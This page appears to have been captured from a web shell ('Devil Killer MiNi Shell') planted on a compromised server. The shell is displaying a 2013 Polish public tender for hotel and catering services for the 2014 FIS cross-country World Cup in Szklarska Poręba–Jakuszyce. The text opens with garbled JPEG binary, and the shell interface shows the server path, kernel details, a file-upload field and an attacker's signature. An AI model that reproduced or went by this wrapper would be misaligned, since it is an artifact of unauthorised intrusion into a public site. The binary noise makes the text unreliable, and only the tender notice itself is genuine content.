JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131210/267087-N-2013.html

<p class="kh_header"><b>Szklarska Poręba: ZAKUP USŁUG HOTELARSKICH I GASTRONOMICZNYCH 
NA POTRZEBY ORGANIZACJI ZAWODÓW PUCHARU ŚWIATA FIS W NARCIARSTWIE BIEGOWYM 
SZKLARSKA PORĘBA -  JAKUSZYCE 2014</b><br>
<b>Numer ogłoszenia: 267087 - 2013; data zamieszczenia: 10.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SPORT SZKLARSKA PORĘBA  Sp. z o.o. , ul. Mickiewicza 21, 58-580 Szklarska Poręba, woj. dolnośląskie, tel. 75 717 20 63, faks 75 717 20 63.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sport.szklarskaporeba.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAKUP USŁUG HOTELARSKICH I GASTRONOMICZNYCH 
NA POTRZEBY ORGANIZACJI ZAWODÓW PUCHARU ŚWIATA FIS W NARCIARSTWIE BIEGOWYM 
SZKLARSKA PORĘBA -  JAKUSZYCE 2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem  zamówienia jest  zakup usług hotelarskich i gastronomicznych ( na potrzeby organizacji zawodów Pucharu Świata FIS w narciarstwie biegowym Szklarska Poręba -  Jakuszyce 2014. 
  
2.Zakup usług hotelarskich i gastronomicznych dotyczy obiektów hotelowych  minimum trzygwiazdkowych,
 z  łącznym  zapotrzebowaniem 400 miejsc,  z możliwością zachowania tolerancji  in ? 10%, w terminach:

 a)od 10 stycznia do 22 stycznia 2014 r.    -     5 miejsc        w  tym    w  SGL:   5                  0
 b)od 12 stycznia do 22 stycznia 2014 r.    -   24 miejsc      w tym         0                         w DBL: 12
c) od 13 stycznia do 19 stycznia 2014 r.    -     5 miejsc      w  tym   w  SGL:      5                0
d) od 13 stycznia do 20 stycznia 2014 r.    -   20 miejsc      w  tym    w  SGL:     4             w DBL : 8
 e) od 15 stycznia do 19 stycznia 2014 r.    -   12 miejsc      w  tym    w  SGL:   12                0
 f) od 15 stycznia do 20 stycznia 2014 r.    -   64 miejsc      w  tym    w  SGL:   18             w DBL :  23
g) od 16 stycznia do 19 stycznia 2014 r.    -  134 miejsc     w  tym    w  SGL:   28             w DBL :  53
    h) od 16 stycznia do 20 stycznia 2014 r.    -    90 miejsc     w  tym    w  SGL:   10             w DBL :  40
 i) od 16 stycznia do 23 stycznia 2014 r.    -    20 miejsc     w  tym    w  SGL:     2             w DBL :    9
j) od 17 stycznia do 20 stycznia 2014 r.    -    26 miejsc     w  tym        0                          w DBL :  13

       oznacz.   SGL- pokoje jednoosobowe
                  DBL - pokoje dwuosobowe, z oddzielnymi łóżkami      

3. Zgodnie z obowiązującym regulaminem FIS na podstawie, którego Zamawiający otrzymuje    zgłoszenie liczby osób, wstępne potwierdzenie ilości miejsc i terminów ich rezerwacji  możliwe będzie do 31grudnia 2013 r. 




4. Zamawiający przekaże  Wykonawcy usługi  szczegółowy harmonogram zakwaterowania wraz      z listą uczestników i terminami rezerwacji pokoi    w terminie 7 dni przed  planowanym  rozpoczęciem realizacji usług hotelarskich i gastronomicznych.  

5.WARUNKI  I WYMAGANIA , których nie spełnienie, chociażby w jednym punkcie, powoduje odrzucenie oferty:

5.1  pokoje jedno i dwuosobowych z oddzielnymi łóżkami, wyposażone w  pełny węzeł sanitarny (łazienka          z toaletą, prysznicem, umywalką ),TV, telefon.

      5.2   możliwość zajęcia pokoju co najmniej pięć (5)  godzin przed standardowym rozpoczęciem doby hotelowej  
               o 14:00, 

      5.3   możliwość opuszczenia pokoju  do ośmiu (8) godzin po standardowym zakończeniu doby hotelowej o 12:00,
  
      5.4   przygotowanie posiłków  ( śniadanie, obiad, kolacja lub obiadokolacja)  wyłącznie w formie bufetowej           z  uwzględnieniem diety dla sportowców  bogatej w węglowodany oraz różnorodnością  warzyw gotowanych na parze, owoców i nabiału , w godzinach:
     - śniadanie                            od 06:30  do 11:00
     - obiad ( lunch)                     od 12:00  do 15:00
     - kolacja (obiadokolacja)    od 17:00  do 20:00

               i przy uwzględnieniu minimalnych wymogów dotyczących menu  podczas zawodów FIS:  

         5.4.1   ŚNIADANIE
chleb (pieczywo ciemne i białe)
masło/margaryna
wędliny, sery, twaróg, nabiał
warzywa  (różne)
owoce (różne)
herbata, kawa, woda mineralna, soki owocowe
        5.4.2   OBIAD  I   KOLACJA 
lekka zupa lub przystawka
200 g mięsa  (2-3 dania do wyboru)
makaron, ryż, kasza, frytki, ziemniaki
gotowane warzywa
lekkie surówki i sałatki (kilka rodzajów)
owoce (różne)
deser 
herbata, kawa, woda mineralna, soki owocowe,

5.5   zapewnienie elastyczności godzin posiłków,





5.6    zapewnienie  uczestnikom zakwaterowania możliwości  dokonywania na terenie hotelu  płatności kartami płatniczymi,

5.7   zapewnienie personelu hotelu ze znajomością  języka angielskiego i niemieckiego 
               (przed podpisaniem umowy - Zamawiający ma prawo przeprowadzania, ze wskazana obsługą ,   konwersacji sprawdzającej znajomość języka obcego),

5.8	 zapewnienie stosownej ilości  bezpłatnych, odśnieżonych i na bieżąco odśnieżanych miejsc parkingowych na posesji przynależnej do hotelu. 
          Odśnieżanie dotyczy również dojazdu na parking hotelowy. 
          Przez  pojęcie _ stosownej _należy rozumieć :  liczbę  zarezerwowanych pokoi jednoosobowych plus 75%     z zarezerwowanej liczby pokoi dwuosobowych.

      5.9    zapewnienie całodobowej ochrony obiektu hotelowego  dla celów bezpieczeństwa.

                  5.10 zapewnienie, w obiekcie hotelowym, bezpłatnego  bezprzewodowego internetu o szybkości przesyłu        minimum 2 Mb zgodnie z zapotrzebowaniem osób zakwaterowanych w terminie realizacji umowy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.01.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagana</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Jeżeli Wykonawca, wykazując spełnienie warunków , o których mowa w art.22.ust.1 upzp, polega na zasobach innych podmiotów na zasadach określonych w art.26 ust.2b upzp, Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego 
wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów żąda
pisemnego zobowiązania innych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - wg wzoru stanowiącego załącznik nr 4</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - za posiadanie na terenie obiektu hotelowego i nieodpłatne udostępnianie basenu o pow. lustra wody min.200m2 i powyżej - 3</li>
<li>3 - za posiadanie na terenie obiektu hotelowego i nieodpłatne udostępnianie basenu o pow. lustra wody powyżej 50m2 i poniżej 200m2 - 2</li>
<li>4 - za posiadanie na terenie obiektu hotelowego i nieodpłatne udostępnianie  basenu o pow. lustra wody do 50 m2 (włącznie) - 1</li>
<li>5 - za posiadanie na terenie obiektu hotelowego i nieodpłatne udostępnianie  SPA (gabinet odnowy biologicznej) - 2</li>
<li>6 - za zapewnienie, w każdym pokoju hotelowym, bezpłatnego internetu o szybkości przesyłu min. 2Mb - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający  przewiduje możliwości zmiany zawartej  umowy  w przypadku:  

    a) zmiany wstępnego zmniejszenia ilości i terminu rezerwowanych miejsc, dokonanej nie później niż do   31.12.2013 r. oraz  ponownie dokonanej zmiany z tolerancją  in ? 10%, w stosunku do potwierdzenia wstępnego, nie później niż na 7 dni przed terminem pobytu.
Ewentualne zmiany są następstwem zapisów obowiązującego regulaminu FIS, dotyczących terminów potwierdzania faktycznej liczby uczestników i terminów ich przyjazdu.
    b) klęski żywiołowej lub nagłych, nieprzewidywalnych i negatywnych zmian warunków   atmosferycznych;
    c) klęski żywiołowej lub nagłych, nieprzewidywalnych zdarzeń niezależnych od Wykonawcy uniemożliwiających realizację przedmiotu zamówienia lub jej kontynuację, albo realizację przedmiotu umowy w terminie określonym w umowie;
    d) ustawowych, nieprzewidywalnych dla Stron Umowy zmian regulacji prawnych w zakresie przedmiotu działalności lub reprezentacji, jednej ze Stron, z wyłączeniem obowiązków wynikających z zasad następstwa prawnego</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sport.szklarskaporeba.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> nieodpłatnie ze strony internetowej, w wersji papierowej - w ciągu 5 dni od daty złożenia wniosku z potwierdzeniem dokonania wpłaty w wysokości 25zł na konto Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.12.2013 godzina 12:00, miejsce: SPORT Szklarska Poręba Sp.z o.o. Mickiewicza 21 (Hotel BORNIT-parter) 58-580 Szklarska Poręba lub bezpośred. w Biurze w godz. 9:00 - 14:00, z wyjąt.soboty i dni ustaw.wolnych od pracy (adres jw.).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> świadczenie usług hotelarskichi gastronomicznych dla grupy zawodników i  trenerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 146 miejsc, w tym:  30 pokoi jednoosob. (SGL) i  58 pokoi dwuosobowych (DBL)
                                                            z wyżywieniem: 3 posiłki (FB) tj. śniadanie, obiad, kolacja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.01.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> świadczenie usług hotelarskichi gastronomicznych dla grupy zawodników i trenerów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 161 miejsc, w tym:  15 pokoi jednoosob. (SGL) i  73 pokoi dwuosobowych (DBL) 
                                                            z wyżywieniem: 3 posiłki (FB) tj. śniadanie, obiad, kolacja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 23.01.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> świadczenie usług hotelarskich i gastronomicznych dla przedstawicieli FIS.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -   27 miejsc, w tym:  27 pokoi jednoosob. (SGL)
                                                            z wyżywieniem: 2 posiłki (HB) tj. śniadanie, obiadokolacja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.01.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> świadczenie usłu hotelarskich i gastronomicznych dla TVP +INFRONT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 35 miejsc, w tym:    5 pokoi jednoosob. (SGL) i  15 pokoi dwuosobowych (DBL)
                                                            z wyżywieniem: 2 posiłki (HB) tj. śniadanie, obiadokolacja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.01.2014.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> świadczenie usług hotelarskich i gastronomicznych dla  TVP + INFRONT.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 31 miejsc, w tym:    7 pokoi jednoosob. (SGL) i  12 pokoi dwuosobowych (DBL)
                                                            z wyżywieniem: 2 posiłki (HB) tj. śniadanie, obiadokolacja.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.10.00.00-1, 55.30.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.01.2014.</li></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com